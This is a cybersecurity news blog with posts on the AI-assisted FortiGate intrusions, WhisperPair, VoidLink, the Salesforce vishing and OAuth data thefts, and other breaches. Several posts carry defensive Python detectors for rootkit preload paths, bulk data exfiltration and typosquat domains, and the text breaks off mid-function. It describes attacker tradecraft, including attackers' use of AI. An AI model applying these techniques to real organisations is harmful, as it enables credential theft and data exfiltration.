squirrelworks Security Blog

Fortinet attacker leveraged AI to target 600+ devices

Monday, February 23, 2026 | By SquirrelBot

Through routine threat intelligence operations, Amazon Threat Intelligence identified infrastructure hosting malicious tooling associated with this campaign. The threat actor had staged additional operational files on the same publicly accessible infrastructure, including AI-generated attack plans, victim configurations, and source code for custom tooling.

This inadequate operational security provided comprehensive visibility into the threat actor's methodologies and the specific ways they leverage AI throughout their operations.

The threat actor compromised globally dispersed FortiGate appliances, extracting full device configurations that yielded credentials and network topology information. They then used these stolen credentials to connect to victim internal networks and conduct post-exploitation activities including Active Directory compromise, credential harvesting, and attempts to access backup infrastructure, consistent with pre-ransomware operations.1

Following successful compromise, the hackers were seen leveraging open source offensive tools to extract NTLM password hashes, obtain complete domain credential databases, and move laterally through pass-the-hash/pass-the-ticket attacks.

The attackers were also seen targeting Veeam Backup & Replication servers, likely to extract additional credentials and destroy backups in preparation for ransomware attacks.2

According to AWS's observations, FortiGate vulnerabilities were not exploited by the hacker. Instead, the campaign exploited exposed management ports and weak credentials with single-factor authentication.

Moreover, when the actor encountered more secure environments, they moved on to softer targets rather than persisting, meaning their capability probably lies in AI-augmented efficiency and scale, not deeper technical skills, according to AWS.

The targeting seemed opportunistic rather than sector-specific, attacking vulnerable appliances via mass scanning using AI tools, AWS noted.3

A Reddit user's take:

"Do not expose your MGMT interfaces to the internet" is recurring advice.

What about limiting mgmt access to trusted IP hosts via a local-in-policy?

PLEASE NOTE: we are NOT talking about "Administrators" object settings here, as it's well known that using that so-called mitigation will cause the login page to be actually presented to the potential attacker - and, ANY exposed HTTP(S) protocol will sooner or later be breached by the CVE of the week.

We are talking about: I set ONE main trusted public IP address the mgmt interface should reply to by actually presenting a web page (and maybe a 2nd one acting as a backup)... that's two addresses out of 4 billion.

All other HTTP(S) requests to the GUI are just silently dropped, with no reply whatsoever.

Is that safe enough?

Added: one could even expand this concept by blocking via local-in-policy, WAN-side, any other critical protocol, as an added safety measure - even if that protocol has never been activated in the first place: SSH/TELNET, FTP, SNMP, etc.


  1. aws.amazon.com/blogs/security/ai-augmented-threat-actor-accesses-fortigate-devices-at-scale/
  2. securityweek.com/hundreds-of-fortigate-firewalls-hacked-in-ai-powered-attacks-aws/
  3. reddit.com/r/fortinet/comments/1rb9nij/amazon_aiassisted_hacker_breached_600_fortinet/
  4. siliconrepublic.com/enterprise/amazon-aws-commercial-gen-ai-firewall-fortigate-breach

WhisperPair vulnerability - 17 models of headphones and speakers need updates

Thursday, January 15, 2026 | By Michael Banks

Google Fast Pair enables fast pairing and account synchronization with Bluetooth accessories such as earbuds, headphones, and speakers, all with a single tap.

The Fast Pair specification states that the pairing procedure should only be performed if the accessory is in pairing mode, but models from numerous brands do not check the pairing status of the device.

These improper implementations of Fast Pair open the door to a series of attacks dubbed WhisperPair, which allow attackers to take control of vulnerable accessories, academic researchers at the Computer Security and Industrial Cryptography group of Belgium's KU Leuven University explain.

"WhisperPair enables attackers to forcibly pair a vulnerable Fast Pair accessory (e.g., wireless headphones or earbuds) with an attacker-controlled device (e.g., a laptop) without user consent," the researchers say.

The security defect allows attackers within a range of up to 14 meters (~46 feet) to start the pairing process and "finish the Fast Pair procedure by establishing a regular Bluetooth pairing", within seconds.

"This gives an attacker complete control over the accessory, allowing them to play audio at high volumes or record conversations using the microphone," the academics note.1

Security researchers at Belgium's KU Leuven University Computer Security and Industrial Cryptography group are revealing a collection of vulnerabilities they found in 17 audio accessories that use Google's Fast Pair protocol and are sold by 10 different companies: Sony, Jabra, JBL, Marshall, Xiaomi, Nothing, OnePlus, Soundcore, Logitech, and Google itself. The hacking techniques the researchers demonstrated, which they're collectively calling WhisperPair, would allow anyone within Bluetooth range of those devices (close to 50 feet in their testing) to silently pair with audio peripherals and hijack them.2

The Google Fast Pair Service (GFPS) utilizes Bluetooth Low Energy (BLE) to discover nearby Bluetooth devices. Many big-name audio brands use Fast Pair in their flagship products, so the potential attack surface consists of hundreds of millions of devices. The weakness lies in the fact that Fast Pair skips checking whether a device is in pairing mode. As a result, a device controlled by an attacker, such as a laptop, can trigger Fast Pair even when the earbuds are sitting in a user's ear or pocket, then quickly complete a normal Bluetooth pairing and take full control.

What that control enables depends on the capabilities of the hijacked device. This can range from playing disturbing noises to recording audio via built-in microphones.

It gets worse if the attacker is the first to pair the accessory with an Android device. In that case, the attacker's Owner Account Key, which designates the attacker's Google account as the legitimate owner's, is written to the accessory. If the Fast Pair accessory also supports Google's Find Hub network, which many people use to locate lost items, the attacker may then be able to track the accessory's location.

Google classified this vulnerability, tracked under CVE-2025-36911, as critical. However, the only real fix is a firmware or software update from the accessory manufacturer, so users need to check with their specific brand and install accessory updates, as updating the phone alone does not fix the issue.3
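
The defect described above is a missing state check: the accessory honours a pairing request whether or not the user put it in pairing mode. The following Python model is an added example, not code from the KU Leuven researchers or from Google's Fast Pair implementation. It reduces an accessory to the one decision that matters here and also models the "first to pair becomes owner" rule from the paragraph above. State names, the request shape and the account-key values are constructed simplifications.

```python
"""Model of a Fast Pair accessory's pairing gate (added example).

check_pairing_mode=False models the vulnerable firmware; True models the
behaviour the Fast Pair specification asks for.
"""
from dataclasses import dataclass, field
from enum import Enum
from typing import List, Optional


class State(Enum):
    IDLE = "idle"               # powered on, sitting in an ear or a pocket
    PAIRING_MODE = "pairing"    # user deliberately pressed the pairing button
    CONNECTED = "connected"


# Constructed placeholder account keys (Fast Pair account keys are 16 bytes);
# these are arbitrary values, not keys from any real device.
STRANGER_KEY = b"\x04" + b"\xaa" * 15
OWNER_KEY = b"\x04" + b"\xbb" * 15


@dataclass
class Accessory:
    check_pairing_mode: bool               # False models the vulnerable firmware
    state: State = State.IDLE
    owner_account_key: Optional[bytes] = None
    paired_peers: List[str] = field(default_factory=list)
    log: List[str] = field(default_factory=list)

    def enter_pairing_mode(self) -> None:
        self.state = State.PAIRING_MODE

    def handle_pairing_request(self, peer: str, account_key: bytes) -> bool:
        """Handle a pairing request from `peer`; return True if accepted.

        The hardened accessory refuses unless the user put it in pairing mode.
        The vulnerable one accepts at any time, which is the WhisperPair
        condition: any device in range can pair silently.
        """
        if self.check_pairing_mode and self.state != State.PAIRING_MODE:
            self.log.append(f"rejected {peer}: not in pairing mode")
            return False
        self.paired_peers.append(peer)
        # The first account key written wins ownership, mirroring the point
        # that the first Android device to pair sets the owner key.
        if self.owner_account_key is None:
            self.owner_account_key = account_key
        self.state = State.CONNECTED
        self.log.append(f"paired with {peer}")
        return True


def simulate(check_pairing_mode: bool) -> dict:
    """Replay the scenario: a stranger's laptop sends a request while the
    accessory is idle, then the real owner pairs the normal way."""
    acc = Accessory(check_pairing_mode=check_pairing_mode)
    stranger_ok = acc.handle_pairing_request("unknown-laptop", STRANGER_KEY)
    acc.enter_pairing_mode()
    owner_ok = acc.handle_pairing_request("owner-phone", OWNER_KEY)
    return {
        "stranger_paired": stranger_ok,
        "owner_paired": owner_ok,
        "owner_key_is_owners": acc.owner_account_key == OWNER_KEY,
        "log": acc.log,
    }


if __name__ == "__main__":
    print("vulnerable:", simulate(False))
    print("hardened:  ", simulate(True))
```

In the vulnerable run the stranger pairs while the accessory is idle and, because it was first, its key becomes the owner key; in the hardened run the same request is rejected and the real owner's key is the one stored. The fix is a firmware change on the accessory, which is why updating the phone alone does not help.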


  1. securityweek.com/whisperpair-attack-leaves-millions-of-bluetooth-accessories-open-to-hijacking/
  2. wired.com/story/google-fast-pair-bluetooth-audio-accessories-vulnerability-patches/
  3. malwarebytes.com/blog/news/2026/01/whisperpair-exposes-bluetooth-earbuds-and-headphones-to-tracking-and-eavesdropping

VoidLink - A newly identified cloud-native Linux malware framework

Tuesday, January 13, 2026 | By SquirrelBot

A new Linux malware framework linked to Chinese-affiliated actors has been discovered by security researchers at Check Point Research.

Key takeaways1
  • VoidLink is an advanced malware framework made up of custom loaders, implants, rootkits, and modular plugins designed to maintain long-term access to Linux systems. The framework includes multiple cloud-focused capabilities and modules, and is engineered to operate reliably in cloud and container environments over extended periods.
  • VoidLink's architecture is extremely flexible and highly modular, centered around a custom Plugin API that appears to be inspired by Cobalt Strike's Beacon Object Files (BOF) approach. This API is used in more than 30 plug-in modules available by default.
  • VoidLink employs multiple Operational Security (OPSEC) mechanisms, including runtime code encryption, self-deletion upon tampering, and adaptive behavior based on the detected environment, alongside a range of user-mode and kernel-level rootkit capabilities.
  • The framework appears to be built and maintained by Chinese-affiliated developers (exact affiliation remains unclear) and is actively evolving. Its overall design and thorough documentation suggest it is intended for commercial purposes.
  • The developers demonstrate a high level of technical expertise, with strong proficiency across multiple programming languages, including Go, Zig, C, and modern frameworks such as React. In addition, the attacker possesses in-depth knowledge of sophisticated operating system internals, enabling the development of advanced and complex solutions.
  • Once a machine is infected, VoidLink surveys the compromised system and can detect which cloud provider the infected machine is running under.

Dubbed VoidLink, the framework consists of custom loaders, implants, and rootkits, and was purpose-built for long-term access to Linux systems.2

The cloud-first implant was written in the Zig programming language and designed to identify major cloud environments, such as AWS, GCP, Azure, Alibaba, and Tencent, as well as Kubernetes pods and Docker containers, and adjust its behavior accordingly.

This highly modular framework, named VoidLink by its developers, includes over 30 plugins, cloud and container persistence capabilities and robust operational security (OPSEC) features.

While no evidence of real-world infections linked to VoidLink has been observed, and it is not clear whether the framework is intended to be sold as a legitimate penetration testing tool or a cybercriminal toolkit, its documentation suggests it is intended for commercial purposes. It appears to be built and maintained by Chinese-speaking developers and is actively evolving, Check Point researchers noted in a report published on January 13.

The VoidLink developers demonstrate a high level of technical expertise, with strong proficiency across multiple programming languages. With VoidLink, they offer a sophisticated, feature rich tool to move through cloud environments and container ecosystems with adaptive stealth.

The Check Point Research team discovered VoidLink in December 2025, after it identified a small cluster of previously unseen Linux malware samples that seemed to originate from a Chinese-speaking development environment:

"Many of the binaries included debug symbols and other development artifacts, suggesting we were looking at in-progress builds rather than a finished, widely deployed tool. The speed and variety of changes across the samples indicate a framework that is being iterated upon quickly to achieve broader, real-world use."

VoidLink can steal credentials for cloud, Git, and other source code version control systems, and Check Point believes it is likely targeted at software engineers, either for espionage or supply-chain attacks.3

Likely created in a Chinese-affiliated development environment, the framework is still work in progress, but already contains a broad feature set, along with a development API inspired by Cobalt Strike, and is rapidly evolving.

"It includes rootkit-style capabilities (LD_PRELOAD, LKM, and eBPF), an in-memory plugin system for extending functionality, and adaptive stealth that adjusts runtime evasion based on the security products it detects, favoring operational security over performance in monitored environments."

VoidLink is deployed using a two-stage loader. Upon initialization, it enumerates the system's security tools and hardening measures to calculate a risk score and an evasion strategy that its modules then use for increased stealth. The framework supports multiple command-and-control (C&C) communication channels, such as HTTP/HTTPS, ICMP, and DNS tunneling, as well as P2P/mesh-style communication between infected systems. The framework creates a profile of host behavior to adapt C&C communication intervals, has a stealth module containing rootkits targeting various kernel versions that are deployed based on the infected environment, and contains several anti-analysis mechanisms.
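
Of the three rootkit techniques Check Point lists, the LD_PRELOAD variant is the one a defender can check for from user space, because it has to leave a trace in /etc/ld.so.preload or in the LD_PRELOAD variable of a process environment. The script below is an added example, not Check Point's tooling and not tied to VoidLink's actual file names; it flags preload entries that live outside the standard library directories. The file contents and process environments embedded in it are constructed samples; read_live() collects the real ones on a Linux host.

```python
"""Spot LD_PRELOAD-style user-mode hooking on a Linux host (added example)."""
import os
import re

TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")

# Constructed /etc/ld.so.preload contents: one ordinary entry, one suspicious.
SAMPLE_PRELOAD_FILE = (
    "/usr/lib/x86_64-linux-gnu/libfakeroot.so\n"
    "/dev/shm/.x/libsys.so\n"
)

# Constructed /proc/<pid>/environ blobs (NUL-separated, as the kernel exposes them).
SAMPLE_ENVIRONS = {
    1234: b"PATH=/usr/bin\x00LD_PRELOAD=/tmp/.cache/libnet.so\x00HOME=/root\x00",
    5678: b"PATH=/usr/bin\x00HOME=/home/dev\x00",
}


def suspicious_paths(paths):
    """Return the paths that are not under a trusted library directory."""
    return [p for p in paths if p and not p.startswith(TRUSTED_LIB_DIRS)]


def check_preload_file(content):
    """Audit /etc/ld.so.preload text; every line is one shared object path."""
    return suspicious_paths(line.strip() for line in content.splitlines())


def check_environs(environs):
    """environs: {pid: raw environ bytes}. Return [(pid, path), ...] for
    LD_PRELOAD entries outside the trusted directories. The variable accepts
    colon- or space-separated lists, so both separators are handled."""
    hits = []
    for pid, blob in environs.items():
        for item in blob.split(b"\x00"):
            if item.startswith(b"LD_PRELOAD="):
                value = item[len(b"LD_PRELOAD="):].decode(errors="replace")
                for path in suspicious_paths(re.split(r"[:\s]+", value)):
                    hits.append((pid, path))
    return hits


def read_live():
    """Collect the real inputs on a Linux host (root is needed to read other
    users' /proc/<pid>/environ)."""
    try:
        with open("/etc/ld.so.preload") as fh:
            preload = fh.read()
    except FileNotFoundError:
        preload = ""
    environs = {}
    for pid in (d for d in os.listdir("/proc") if d.isdigit()):
        try:
            with open(f"/proc/{pid}/environ", "rb") as fh:
                environs[int(pid)] = fh.read()
        except OSError:
            continue
    return preload, environs


if __name__ == "__main__":
    preload, environs = SAMPLE_PRELOAD_FILE, SAMPLE_ENVIRONS
    for path in check_preload_file(preload):
        print("ld.so.preload:", path)
    for pid, path in check_environs(environs):
        print(f"pid {pid}: LD_PRELOAD {path}")
```

The caveat is the other two techniques on the list: a loadable kernel module or eBPF rootkit can hide both the file and the process environment from user-space tools, so an empty result here rules out only the LD_PRELOAD variant, and the check belongs alongside kernel-level integrity monitoring rather than in place of it.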

VoidLink's operators can control agents, implants, and plugins via a web-based dashboard localized for Chinese users.

The dashboard allows operators to deploy 37 VoidLink plugins for various post-exploitation activities, enabling them to perform reconnaissance, lateral movement, persistence, process injection, credential access, and evidence deletion.

A build interface allows threat actors to generate customized implants with specific capabilities and stealth parameters that can be changed at runtime.

Per Check Point: "The framework's intended use remains unclear, and as of this writing, no evidence of real-world infections has been observed. The way it is built suggests it may ultimately be positioned for commercial use, either as a product offering or as a framework developed for a customer"...


  1. securityweek.com/voidlink-linux-malware-framework-targets-cloud-environments/
  2. infosecurity-magazine.com/news/chinese-malware-framework-linux/
  3. research.checkpoint.com/2026/voidlink-the-cloud-native-malware-framework/

Palo Alto and Google Cloud announce deeper AI integration

Friday, December 19, 2025 | By Michael Banks

Palo Alto Networks is migrating "key internal workloads" into Google Cloud Platform (GCP) as part of a new multibillion-dollar agreement that will support a handful of new AI-powered features for the vendor's cybersecurity services.1

The new features include the ability for users to use Google Cloud's Vertex AI and Agent Engine with Palo Alto Networks' Prisma AI Runtime Security (AIRS) platform. This will allow developer tools like the Agent Development Kit to be secured using Prisma AIRS, and users to protect live AI workloads and data on Google Cloud.

Palo Alto Networks, which offers a range of cybersecurity products, already has more than 75 joint integrations with Google Cloud and has completed $2 billion in sales through the Google Cloud Marketplace.2

As part of the new phase of the partnership, Palo Alto Networks customers will be able to protect live AI workloads and data on Google Cloud, maintain security policies, accelerate Google Cloud adoption, and simplify and unify their security solutions, the companies said.

While the announcement was framed as a "landmark agreement", specific financial details remain sparse. Both companies characterized the deal only as a "multibillion-dollar commitment", declining to provide a precise dollar amount or a specific timeframe for the contract's duration. This lack of transparency is common in large-scale cloud partnerships, though it leaves industry analysts to speculate on the exact scale of the hardware commitment versus the software integration costs.

The companies are integrating Palo Alto's Prisma AIRS (AI Security) platform directly into Google Cloud's developer ecosystem3, with the partnership also involving deeper integration of core security infrastructure:
  • Software Firewalls: Palo Alto's VM-Series firewalls will be optimized for Google Cloud to provide deep packet inspection across public and hybrid environments.
  • Global SASE Connectivity: Palo Alto Networks' Prisma Access will leverage Google's global network and Cloud Interconnect, allowing remote workers to access AI applications with reduced latency and consistent security policies.
  • Operational Streamlining: The companies have committed to engineering pre-vetted solutions to reduce the "operational friction" often associated with deploying third-party security in cloud environments.


  1. investors.paloaltonetworks.com/news-releases/news-release-details/palo-alto-networks-and-google-cloud-forge-landmark-agreement
  2. sdxcentral.com/news/palo-alto-networks-deepens-google-cloud-integration/
  3. securityweek.com/palo-alto-networks-google-cloud-strike-multibillion-dollar-ai-and-cloud-security-deal/

Chrome 143 patches UAF issue

Tuesday, December 2, 2025 | By Michael Banks

The latest patch[1] for Google Chrome addresses several flaws of varying severity[2], including a high-severity use-after-free (UAF) vulnerability. A use-after-free occurs when dynamically allocated memory is freed but a pointer to it is not reset, leaving a 'dangling' pointer that attackers can manipulate.[3]

  1. securityweek.com/chrome-143-patches-high-severity-vulnerabilities/
  2. encyclopedia.kaspersky.com/glossary/use-after-free/
  3. chromereleases.googleblog.com/2025/12/stable-channel-update-for-desktop.html

Windows kernel zero-day patched

Wednesday, November 12, 2025 | By Michael Banks

The vulnerability is tracked as CVE-2025-62215.

According to an advisory from Microsoft's Threat Intelligence Center and Security Response Center, successful exploitation requires an attacker to win a race condition (Concurrent Execution using Shared Resource with Improper Synchronization) in the Windows kernel[2], which would result in privilege escalation (SYSTEM) on the targeted system.[3]

The fix was released among the other updates for the November 2025 Patch Tuesday. Help Net Security describes it as a memory corruption issue. Trend Micro's Dustin Childs notes that "Bugs like these are often paired with a code execution bug by malware to completely take over a system."[4]



  1. securityweek.com/microsoft-patches-actively-exploited-windows-kernel-zero-day/
  2. nvd.nist.gov/vuln/detail/CVE-2025-62215
  3. msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-62215
  4. helpnetsecurity.com/2025/11/12/patch-tuesday-microsoft-cve-2025-62215/

F5 Hack - a highly sophisticated nation-state threat actor maintained long-term, persistent access

Thursday, October 16, 2025 | By SquirrelBot

According to a Security Advisory released by F5 on Oct 15th, an attack occurred two months prior, in August. The affected systems, based on their evaluation of logs, are known to include:

  • Production development environment
  • Engineering knowledge management platform

Stolen data includes BIG-IP source code, as well as details on undisclosed vulnerabilities; but it's pointed out that there's no known active exploitation of any of those vulnerabilities.

Further, it's believed that exfiltration did not occur on their CRM, financial, support, or iHealth systems, nor is there any indication that these products were affected:

  • Product development environment
  • NGINX source code - web server and platform for app delivery using Kubernetes - Application delivery management software to optimize, scale, and secure modern apps, Kubernetes clusters, API communications, and AI inference across diverse environments.
  • F5 Distributed Cloud Services - SaaS-based security, networking, and app management
  • Silverline systems - Web Application Firewall

F5 states that they'll reach out to notify affected customers.


  1. securityweek.com/f5-hack-attack-linked-to-china-big-ip-flaws-patched-governments-issue-alerts/
  2. f5.com/trials
  3. my.f5.com/manage/s/article/K000154696

Microsoft: Russia, China Increasingly Using AI to Escalate Cyberattacks on the US

Thursday October 16, 2025 | By Michael Banks

Russia, China, Iran and North Korea have sharply increased their use of artificial intelligence to deceive people online and mount cyberattacks against the United States, according to new research from Microsoft.1

This July, the company identified more than 200 instances of foreign adversaries using AI to create fake content online, more than double the number from July 2024 and more than ten times the number seen in 2023.2

Over the last year, Microsoft observed nation-state actors conduct operations for financial gain, enlist cybercriminals to collect intelligence, particularly on the Ukrainian military, and make use of the same infostealers, command and control frameworks, and other tools favored by the cybercriminal community.3 Specifically:
  • Russian threat actors appear to have outsourced some of their cyberespionage operations to criminal groups, especially operations targeting Ukraine. In June 2024, a suspected cybercrime group used commodity malware to compromise at least 50 Ukrainian military devices.
  • Iranian nation-state actors used ransomware in a cyber-enabled influence operation, marketing stolen Israeli dating website data. They offered to remove specific individual profiles from their data repository for a fee.
  • North Korea is getting into the ransomware game. A newly identified North Korean actor developed a custom ransomware variant called FakePenny, which it deployed at organizations in aerospace and defense after exfiltrating data from the impacted networks, demonstrating both intelligence gathering and monetization motivations.

Increasingly, these attackers are using AI to target governments, businesses and critical systems like hospitals and transportation networks, according to Amy Hogan-Burney, Microsoft's vice president for customer security and trust, who oversaw the report.4


  1. usnews.com/news/technology/articles/2025-10-16/microsoft-russia-china-increasingly-using-ai-to-escalate-cyberattacks-on-the-us
  2. securityweek.com/microsoft-russia-china-increasingly-using-ai-to-escalate-cyberattacks-on-the-us/
  3. blogs.microsoft.com/on-the-issues/2024/10/15/escalating-cyber-threats-demand-stronger-global-defense-and-cooperation/
  4. cnbc.com/2025/10/16/microsoft-russia-china-increasingly-using-ai-to-escalate-cyberattacks-on-the-us.html

Red Hat services compromised as 28,000 repos exposed

Monday, October 6, 2025 | By Michael Banks

Initially it was believed that the GitHub instance had been attacked, until Red Hat confirmed it was the GitLab instance used by their Consulting team.

The hacker group is being called Crimson Collective.

The stolen data includes 570 GB of data from 28,000 repositories, including credentials, secrets, and source code.

"At this time, we have no reason to believe the security issue impacts any of our other Red Hat services or products and are highly confident in the integrity of our software supply chain," Red Hat told SecurityWeek in an emailed statement.

"Upon detection, we promptly launched a thorough investigation, removed the unauthorized party's access, isolated the instance, and contacted the appropriate authorities."

"Our investigation, which is ongoing, found that an unauthorized third party had accessed and copied some data from this instance."

On X/Twitter, International Cyber Digest reports that the attackers tried extorting Red Hat, but failed.


  1. securityweek.com/red-hat-confirms-gitlab-instance-hack-data-theft/
  2. scworld.com/news/attack-on-a-redhat-gitlab-instance-hits-28000-repos/
  3. redhat.com/en/blog/security-update-incident-related-red-hat-consulting-gitlab-instance

Salesforce security advisory on recent data theft attacks

Thursday, Oct 2, 2025 | By Michael Banks

In a Salesforce.com notice, it's asserted that the extortion attempts are based on 'past or unsubstantiated events' and that its systems are not technically compromised.



Recapping the attack
Per FBI Flash 20250912-001
ic3.gov/CSA/2025/250912.pdf
Threat actors used vishing tactics against staff across various orgs to gain access to Salesforce instances within those orgs.

UNC6040 threat actors commonly call victims’ call centers posing as IT support employees addressing enterprise-wide connectivity issues. Under the guise of closing an auto-generated ticket, UNC6040 actors trick customer support employees into taking actions that grant the attackers access or lead to the sharing of employee credentials, allowing them access to targeted companies’ Salesforce instances to exfiltrate customer data.

UNC6040 threat actors have utilized phishing panels, directing victims to visit from their mobile phones or work computers during the social engineering calls. After obtaining access, UNC6040 threat actors have then used API queries to exfiltrate large volumes of data in bulk.

UNC6040 threat actors have also directly requested user credentials and multifactor authentication codes to authenticate and add the Salesforce Data Loader application, facilitating data exfiltration.

Salesforce allows organizations to integrate with third-party applications, often called connected apps, using OAuth tokens for authentication after approval by an administrator or sufficiently privileged user. UNC6040 threat actors have deceived victims into authorizing malicious connected apps to their organization's Salesforce portal. This application is often a modified version of Salesforce's Data Loader. During a vishing call, the actor guides the victim to visit Salesforce's connected app setup page, i.e., https://login.salesforce[.]com/setup/connect, to approve the UNC6040 malicious app. This grants UNC6040 threat actors significant capabilities to access, query, and exfiltrate sensitive information directly from the compromised Salesforce customer environments. Authorizing a malicious connected app bypasses many traditional defenses such as MFA, password resets and login monitoring, and because OAuth tokens are issued by Salesforce itself, activity coming from the malicious app can look like it's from a trusted integration.

UNC6040 threat actors have created malicious applications within Salesforce trial accounts, allowing the threat actors the ability to register the connected apps without using a legitimate corporate account, making detection difficult.

Some UNC6040 victims have subsequently received extortion emails allegedly from the ShinyHunters group, demanding payment in cryptocurrency to avoid publication of exfiltrated data. These extortion demands have varied in time following UNC6040 threat actors' access and data exfiltration, ranging from a period of days to months.


In Flash 20250912-001 the FBI recommends network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by cyber criminals:
  • Train call center employees to recognize and report phishing attempts
  • Require phishing-resistant multi-factor authentication (MFA) for as many services as possible
  • Implement authentication, authorization, and accounting (AAA) systems to limit actions users can perform. Apply the Principle of Least Privilege to user accounts and groups, allowing only the performance of authorized actions.
  • Enforce IP-based access restrictions and monitor and detect API usage, looking for unusual or malicious behavior.
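
The FBI's playbook description and its last mitigation point at the same detection opportunity: a connected app the organization has never seen before, followed by bulk API exports, often from an address outside the corporate network. The script below is an added example, not from the FBI flash or from Salesforce; it runs those three checks over an activity log. The CSV embedded in it is a constructed stand-in for an Event Monitoring export (real field names differ and would need mapping in parse_log), and the app allowlist, trusted network and row threshold are assumptions to be replaced with the organization's own.

```python
"""Flag the tells of the UNC6040 playbook in Salesforce activity records
(added example; the log, allowlist and thresholds are constructed)."""
import csv
import io
import ipaddress

# Constructed sample log. Columns are an assumption, not Salesforce's schema.
SAMPLE_LOG = """\
timestamp,user,app,event,rows,source_ip
2025-09-10T09:01:00Z,alice@example.com,Salesforce for Outlook,API,120,198.51.100.20
2025-09-10T09:05:00Z,bob@example.com,Data Loader,API,800,198.51.100.21
2025-09-11T14:22:00Z,carol@example.com,My Ticket Sync,OAUTH_CONSENT,0,203.0.113.77
2025-09-11T14:25:00Z,carol@example.com,My Ticket Sync,API,250000,203.0.113.77
2025-09-11T14:40:00Z,carol@example.com,My Ticket Sync,API,310000,203.0.113.77
"""

KNOWN_APPS = {"Salesforce for Outlook", "Data Loader"}        # constructed allowlist
TRUSTED_NETS = [ipaddress.ip_network("198.51.100.0/24")]      # constructed egress range
BULK_ROW_THRESHOLD = 100_000                                  # assumed per-call ceiling


def parse_log(text):
    """Parse the CSV into dicts, converting the row count to an integer."""
    records = list(csv.DictReader(io.StringIO(text)))
    for record in records:
        record["rows"] = int(record["rows"])
    return records


def from_trusted_network(ip):
    """True if the source address falls inside an allowed corporate range."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in TRUSTED_NETS)


def detect(text, known_apps=KNOWN_APPS, bulk_threshold=BULK_ROW_THRESHOLD):
    """Return one alert per suspicious record, listing every reason it tripped:
    an app not on the allowlist, a bulk export, or an untrusted source IP."""
    alerts = []
    for record in parse_log(text):
        reasons = []
        if record["app"] not in known_apps:
            reasons.append("unknown_connected_app")
        if record["event"] == "API" and record["rows"] >= bulk_threshold:
            reasons.append("bulk_export")
        if not from_trusted_network(record["source_ip"]):
            reasons.append("untrusted_ip")
        if reasons:
            alerts.append({
                "timestamp": record["timestamp"],
                "user": record["user"],
                "app": record["app"],
                "reasons": reasons,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The OAUTH_CONSENT record is the one worth paging on: it is the moment described in the flash where the victim approves the attacker's app, and it arrives minutes before the bulk exports. An allowlist of connected apps maintained by the Salesforce admin turns that single event into a high-confidence alert, whereas the row threshold on its own will lag behind the first export.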


How did it happen? A Reddit user explains:

.....you just need a user to accept OAuth consent for an illegitimate app. By default, Salesforce allows this as long as the user has API access. The individual app can be blocked and OAuth revoked by an admin later, but the first "install" is allowed by default.

The attackers are trying to extort Salesforce, the platform vendor, as well as the customers who use it. They claim to have stolen 1 billion records from brands including Adidas, Air France/KLM, Allianz Life, Cisco, Dior, Disney, FedEx, Google, Home Depot, Kering, Louis Vuitton, Qantas, Stellantis, Toyota, TransUnion, UPS and Workday, among others.



Who is behind this?

Per Security Week:
Lapsus$ has been inactive since 2022, when Scattered Spider emerged. ShinyHunters first appeared in 2020 and joined forces with Scattered Spider earlier this year. They jointly announced their retirement last month.


What should be done? From reddit users

Primary focus should be on Connected App use, blocking those not needed, and securing those you do use via whitelisting and least-privilege access models. The majority of Salesforce-related security issues are human error (phishing, incorrect config) and are mitigated with proper security-by-design practices.



Volvo North America part of the Miljodata ransomware breach

Wednesday, October 1, 2025 | By SquirrelBot

Attackers targeted Miljodata, a Swedish IT systems provider contracted by the Swedish government to run IT systems for most of Sweden's municipalities. The ransomware attack occurred August 20-23 and resulted in leaked personal data of around one million Swedish citizens, including 870k email addresses, names and phone numbers. A spike in phishing attacks is expected, as it is confirmed that the leaked data was published on the dark net. The users affected are current or former employees of Swedish municipalities.

The attackers who are called "Datacarry", demanded 1.5 bitcoin prior to releasing the data.

Lund University, which uses the Adato software that was the point of attack, informed its employees on September 29 that their data was affected. Miljödata supplies the Adato system to Lund University. Adato is a system used primarily to document and manage rehabilitation cases; it's used by HR teams to manage workers' sick leave.

A subset of the stolen data belonged to Volvo, who contracts Miljodata for their IT systems. The breach is now understood to have included Names and SSNs for Volvo's staff.

According to the Massachusetts Attorney General's office, the ransomware attack occurred on August 20 without the company realizing it until three days later. It's widely assumed that a malicious link in an email led to the breach, but details aren't known. The attack is being investigated by police and the IT security company TrueSec Consulting.


  1. theregister.com/2025/09/26/volvo_north_america_confirms_staff/
  2. svt.se/nyheter/inrikes/experten-en-miljon-svenskars-personuppgifter-publicerade-pa-darknet
  3. reddit.com/r/sweden/comments/1nikeev/vad_kan_vi_l%C3%A4ra_oss_av_milj%C3%B6datas/?tl=en

Python developers targeted in new phishing campaign

Wednesday, September 24, 2025 | By Michael Banks

PyPI, the official third-party repository for Python, hosts over 500,000 Python packages and functions as a searchable index. Its users are being targeted by attackers via phishing attacks that employ domain-confusion tactics.

Phishing emails direct victims to the bogus domain 'pypi-mirror.org', where they are pressed to enter credentials to "verify" their accounts or face suspension.

This is extremely dangerous, since a threat actor holding a maintainer's stolen credentials could upload malicious code into existing Python packages.

A similar attack in July 2025 targeted users via typosquatting at the bogus address 'pypj.org'. The legitimate, official site is pypi.org.
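
The two campaigns use different lookalike tricks: pypi-mirror.org puts the real brand inside a longer name (domain confusion), while pypj.org is one keystroke away from the real name (typosquatting). The function below is an added example, not PyPI's own tooling; it classifies the host in a link against the genuine pypi.org and, going a little beyond the two cases in the post, also catches a swapped TLD and a spoofed subdomain such as pypi.org.example.net. The edit-distance threshold and the crude "last two labels" domain extraction are assumptions chosen for the demonstration.

```python
"""Classify links whose host imitates pypi.org (added example)."""
from urllib.parse import urlsplit

PROTECTED = {"pypi.org"}   # the genuine site; blog.pypi.org etc. resolve to it


def registrable_domain(host):
    """Crude eTLD+1 (last two labels). Adequate for .org/.com; a production
    checker would consult the Public Suffix List instead."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def edit_distance(a, b):
    """Levenshtein distance, used to catch single-keystroke typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_link(url):
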